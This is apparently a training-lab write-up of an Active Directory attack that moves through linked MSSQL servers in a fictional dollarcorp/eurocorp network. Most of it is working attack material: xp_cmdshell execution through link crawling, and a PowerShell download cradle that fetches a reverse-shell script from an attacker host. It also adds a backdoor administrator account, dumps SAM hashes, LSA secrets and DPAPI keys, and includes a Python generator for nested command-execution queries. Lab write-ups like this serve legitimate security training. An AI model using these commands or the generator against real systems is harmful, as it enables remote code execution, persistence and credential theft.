# Learning Objective - 22

## MSSQL Servers

Discovering SPNs.

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain


ComputerName     : dcorp-mgmt.dollarcorp.moneycorp.local
Instance         : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount    : svcadmin
DomainAccountCn  : svc admin
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon        : 1/10/2024 3:22 AM
Description      : Account to be used for services which need high privileges.

ComputerName     : dcorp-mgmt.dollarcorp.moneycorp.local
Instance         : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount    : svcadmin
DomainAccountCn  : svc admin
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon        : 1/10/2024 3:22 AM
Description      : Account to be used for services which need high privileges.

ComputerName     : dcorp-mssql.dollarcorp.moneycorp.local
Instance         : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount    : DCORP-MSSQL$
DomainAccountCn  : DCORP-MSSQL
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon        : 3/5/2024 11:56 AM
Description      :

ComputerName     : dcorp-mssql.dollarcorp.moneycorp.local
Instance         : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount    : DCORP-MSSQL$
DomainAccountCn  : DCORP-MSSQL
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon        : 3/5/2024 11:56 AM
Description      :

ComputerName     : dcorp-sql1.dollarcorp.moneycorp.local
Instance         : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount    : DCORP-SQL1$
DomainAccountCn  : DCORP-SQL1
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon        : 3/5/2024 11:56 AM
Description      :

ComputerName     : dcorp-sql1.dollarcorp.moneycorp.local
Instance         : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount    : DCORP-SQL1$
DomainAccountCn  : DCORP-SQL1
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon        : 3/5/2024 11:56 AM
Description      :

```

Checking which of the instances we can connect to.

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: DCORP-STD723 : Connection Failed.
VERBOSE: Closing the runspace pool

ComputerName                           Instance                                    Status
------------                           --------                                    ------
dcorp-mgmt.dollarcorp.moneycorp.local  dcorp-mgmt.dollarcorp.moneycorp.local       Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local      Accessible
dcorp-mgmt.dollarcorp.moneycorp.local  dcorp-mgmt.dollarcorp.moneycorp.local,1433  Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local  dcorp-sql1.dollarcorp.moneycorp.local       Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local  dcorp-sql1.dollarcorp.moneycorp.local,1433  Not Accessible
DCORP-STD723                           DCORP-STD723                                Not Accessible

```

We collect information about the instances we have access to.

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.


ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1976
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student723
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1976
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student723
IsSysadmin             : No
ActiveSessions         : 1

```

Looking for links to remote MSSQL servers.

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLink -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.


ComputerName           : dcorp-mssql
Instance               : dcorp-mssql
DatabaseLinkId         : 0
DatabaseLinkName       : DCORP-MSSQL
DatabaseLinkLocation   : Local
Product                : SQL Server
Provider               : SQLNCLI
Catalog                :
LocalLogin             :
RemoteLoginName        :
is_rpc_out_enabled     : True
is_data_access_enabled : False
modify_date            : 11/14/2022 4:46:10 AM

ComputerName           : dcorp-mssql
Instance               : dcorp-mssql
DatabaseLinkId         : 1
DatabaseLinkName       : DCORP-SQL1
DatabaseLinkLocation   : Remote
Product                : SQL Server
Provider               : SQLNCLI
Catalog                :
LocalLogin             :
RemoteLoginName        :
is_rpc_out_enabled     : False
is_data_access_enabled : True
modify_date            : 12/4/2022 5:16:19 AM


```

Enumerating the links recursively.

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL
VERBOSE:  - Link Login: dcorp\student723
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE:  - Link Login: dblinkuser
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE:  - Link Login: sqluser
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: EU-SQL37
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :


```

Then we run commands on the last server of the chain with the following command (`-QueryTarget` executes the query only on EU-SQL37, where the link login is `sa`):

{% code overflow="wrap" %}

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql37


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :

```

{% endcode %}

We try the same through PowerShell. The doubled `""` inside the query are only there because the whole `-Query` argument is a PowerShell double-quoted string; SQL Server receives `powershell.exe -c "whoami"`.

{% code overflow="wrap" %}

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""whoami""'" -QueryTarget eu-sql37


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :
```

{% endcode %}

Next we launch a reverse shell as we did before, but this time with a different PowerShell download cradle (`iex (iwr -UseBasicParsing ...)`).

{% code overflow="wrap" %}

```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""iex (iwr -UseBasicParsing http://172.16.100.23:8080/Invoke-PowerShellTcp.ps1)""'" -QueryTarget eu-sql37


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :


```

{% endcode %}

In our other terminal we listen on the configured port and get a shell running as SYSTEM on EU-SQL37.

```
C:\AD\Tools\netcat-win32-1.12>.\nc.exe -lvp 6969
listening on [any] 6969 ...
172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.15.17] 56047: NO_DATA
Windows PowerShell running as user SYSTEM on EU-SQL37
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql37
PS C:\Windows\system32>
```

Now we enumerate the current domain and its forest from the new shell with PowerView.

```
PS C:\> Invoke-WebRequest -Uri "http://172.16.100.23:8080/PowerView.ps1" -OutFile "PowerView.ps1"
PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/14/2022   7:42 PM                Program Files
d-----        11/14/2022   7:41 PM                Program Files (x86)
d-r---        11/15/2022   1:49 AM                Users
d-----         1/10/2024   5:38 AM                Windows
-a----          3/6/2024   6:11 AM         924339 PowerView.ps1

PS C:\> . .\PowerView.ps1
PS C:\> Get-DomainComputer | select samaccountname

samaccountname
--------------
EU-DC$
EU-SQL37$


PS C:\> Get-DomainUser | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt
dbadmin

PS C:\> Get-DomainTrust


SourceName      : eu.eurocorp.local
TargetName      : eurocorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/12/2022 5:49:08 AM
WhenChanged     : 2/20/2024 7:48:15 AM

PS C:\> Get-Forest


RootDomainSid         : S-1-5-21-3333069040-3914854601-3606488808
Name                  : eurocorp.local
Sites                 : {Default-First-Site-Name}
Domains               : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs        : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local, DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local,
                        DC=DomainDnsZones,DC=eurocorp,DC=local}
ForestModeLevel       : 7
ForestMode            : Unknown
RootDomain            : eurocorp.local
Schema                : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner       : eurocorp-dc.eurocorp.local
NamingRoleOwner       : eurocorp-dc.eurocorp.local

PS C:\> Get-DomainComputer -Domain eurocorp.local | select samaccountname

samaccountname
--------------
EUROCORP-DC$

PS C:\> Get-DomainUser -Domain eurocorp.local | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt

PS C:\> Get-DomainTrust -Domain eurocorp.local


SourceName      : eurocorp.local
TargetName      : eu.eurocorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/12/2022 5:49:08 AM
WhenChanged     : 2/20/2024 7:48:14 AM

SourceName      : eurocorp.local
TargetName      : dollarcorp.moneycorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection  : Bidirectional
WhenCreated     : 11/12/2022 8:15:23 AM
WhenChanged     : 2/20/2024 7:50:52 AM

```

We also verify that EU-SQL37 is reachable directly from our machine (DNS resolution and ICMP).

```
PS C:\AD\Tools\PowerUpSQL-master> nslookup EU-SQL37.EU.EUROCORP.LOCAL
Server:  UnKnown
Address:  172.16.2.1

Non-authoritative answer:
Name:    EU-SQL37.EU.EUROCORP.LOCAL
Address:  172.16.15.17

PS C:\AD\Tools\PowerUpSQL-master> ping 172.16.15.17

Pinging 172.16.15.17 with 32 bytes of data:
Reply from 172.16.15.17: bytes=32 time=5ms TTL=127
Reply from 172.16.15.17: bytes=32 time=4ms TTL=127

Ping statistics for 172.16.15.17:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 4ms, Maximum = 5ms, Average = 4ms
```

Setting up some quick-and-dirty persistence: a local administrator account.

```
PS C:\Windows\system32> net user bombitaeu Password123! /add
The command completed successfully.

PS C:\Windows\system32> net localgroup administrators bombitaeu /add
The command completed successfully.

PS C:\Windows\system32> net user bombitaeu
User name                    bombitaeu
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/6/2024 6:34:21 AM
Password expires             4/17/2024 6:34:21 AM
Password changeable          3/7/2024 6:34:21 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.

PS C:\Windows\system32>
```

We dump whatever we can with the new local admin over SMB: cached domain logons and LSA secrets with CrackMapExec, then SAM, cached credentials and LSA secrets with secretsdump.

```
crackmapexec smb 172.16.15.17 -u 'bombitaeu' -p 'Password123!' -d '.' --lsa
SMB         172.16.15.17    445    EU-SQL37         [*] Windows 10.0 Build 20348 x64 (name:EU-SQL37) (domain:.) (signing:False) (SMBv1:False)
SMB         172.16.15.17    445    EU-SQL37         [+] .\bombitaeu:Password123! (Pwn3d!)
SMB         172.16.15.17    445    EU-SQL37         [+] Dumping LSA secrets
SMB         172.16.15.17    445    EU-SQL37         EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
SMB         172.16.15.17    445    EU-SQL37         dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
SMB         172.16.15.17    445    EU-SQL37         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.15.17    445    EU-SQL37         [+] Dumped 8 LSA secrets to /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.secrets and /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.cached

```

```
impacket-secretsdump 'bombitaeu@172.16.15.17'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Target system bootKey: 0x5522f4ec06d0bf5dac89558b5e57206e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdcfd73ba273d2b6ab67f1fecd83e88e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bombitaeu:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Dumping cached domain logon information (domain/username:hash)
EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
[*] NL$KM 
 0000   09 C8 7B C2 96 41 6E CB  B2 F6 1B DC 29 5C 39 76   ..{..An.....)\9v
 0010   7E A6 22 97 DC D3 BE 6B  C3 71 48 71 61 6B B2 B3   ~."....k.qHqak..
 0020   D0 D6 E0 48 F0 8B 7D 8B  8B 14 95 05 B4 21 FE 93   ...H..}......!..
 0030   28 51 47 F1 26 24 B5 F4  E4 20 B6 AC E5 90 33 02   (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] Cleaning up... 

```

## Querying directly with SQL

Since that is failing, we repeat the tests with raw SQL instead, chaining OPENQUERY through each linked server one hop at a time. First hop:

<figure><img src="/files/qI4WA5p4QuLyfrmuQfQo" alt=""><figcaption></figcaption></figure>

Second hop:

<figure><img src="/files/UYTmwafRzUgSdqVqE8wS" alt=""><figcaption></figcaption></figure>

Third hop:

<figure><img src="/files/plvG8i17Ho9rcr3RFhuH" alt=""><figcaption></figcaption></figure>

Executing commands through the full chain:

{% code overflow="wrap" %}

```
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql37.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "mkdir C:\test"'''')'')')
```

{% endcode %}

<figure><img src="/files/9q34GLbSeFTuIvzDrgyh" alt=""><figcaption></figcaption></figure>

From the shell on EU-SQL37 we can confirm that the `test` directory has indeed been created:

```
PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/14/2022   7:42 PM                Program Files
d-----        11/14/2022   7:41 PM                Program Files (x86)
d-----          3/6/2024   7:18 AM                test
d-r---        11/15/2022   1:49 AM                Users
d-----         1/10/2024   5:38 AM                Windows
-a----          3/6/2024   6:11 AM         924339 PowerView.ps1


```
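The nested query above, like the `-QueryTarget` crawl earlier, is mechanical but easy to get wrong by hand: every hop embeds the previous statement in a T-SQL string literal, so single quotes double once per level (`'` becomes `''`, then `''''`). The helper below is an added example, not part of this page or of PowerUpSQL; it generates the chain for any link path. The link names come from the crawl output above, and the `exec_at_chain` variant is included for links that have rpc out enabled, which the DCORP-MSSQL -> DCORP-SQL1 link here does not.

```python
import sys


def _lit(sql: str) -> str:
    """Escape text for use inside a T-SQL single-quoted string literal."""
    return sql.replace("'", "''")


def xp_cmdshell_query(command: str) -> str:
    """T-SQL that runs `command` via xp_cmdshell and still returns a result set.

    The leading SELECT gives OPENQUERY a column to bind to; the command is
    itself a literal, so any single quote in it is doubled as well.
    """
    return f"select @@version as version;exec master..xp_cmdshell '{_lit(command)}'"


def openquery_chain(path, inner_sql):
    """Nest `inner_sql` through every linked server in `path` (hop order).

    Works with data access only (no rpc out), which is what the
    DCORP-MSSQL -> DCORP-SQL1 link above provides.
    """
    sql = inner_sql
    for link in reversed(path):  # innermost hop is wrapped first
        sql = f'select * from openquery("{link}",\'{_lit(sql)}\')'
    return sql


def exec_at_chain(path, inner_sql):
    """Same chain with EXEC ... AT: needs rpc out on each link, but can run
    statements that return no rows, such as enabling xp_cmdshell."""
    sql = inner_sql
    for link in reversed(path):
        sql = f"EXEC ('{_lit(sql)}') AT \"{link}\""
    return sql


# Link path discovered by Get-SQLServerLinkCrawl on this page.
PAGE_PATH = ["dcorp-sql1", "dcorp-mgmt", "eu-sql37.eu.eurocorp.local"]

ENABLE_XP_CMDSHELL = (
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
)

if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "whoami"
    print(openquery_chain(PAGE_PATH, xp_cmdshell_query(cmd)))
    print(exec_at_chain(PAGE_PATH, ENABLE_XP_CMDSHELL))
```

Run with the page's path and inner query, it reproduces the statement above character for character. Two caveats the output makes visible: OPENQUERY needs a result set from the innermost statement, which is why `select @@version as version;` precedes the `xp_cmdshell` call, and `sp_configure` returns no rowset, so `xp_cmdshell` cannot be enabled through OPENQUERY alone. With data access only on the links, as with DCORP-SQL1 here, it has to be enabled already on the final server; otherwise the `EXEC ... AT` form over rpc out is the way to turn it on.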

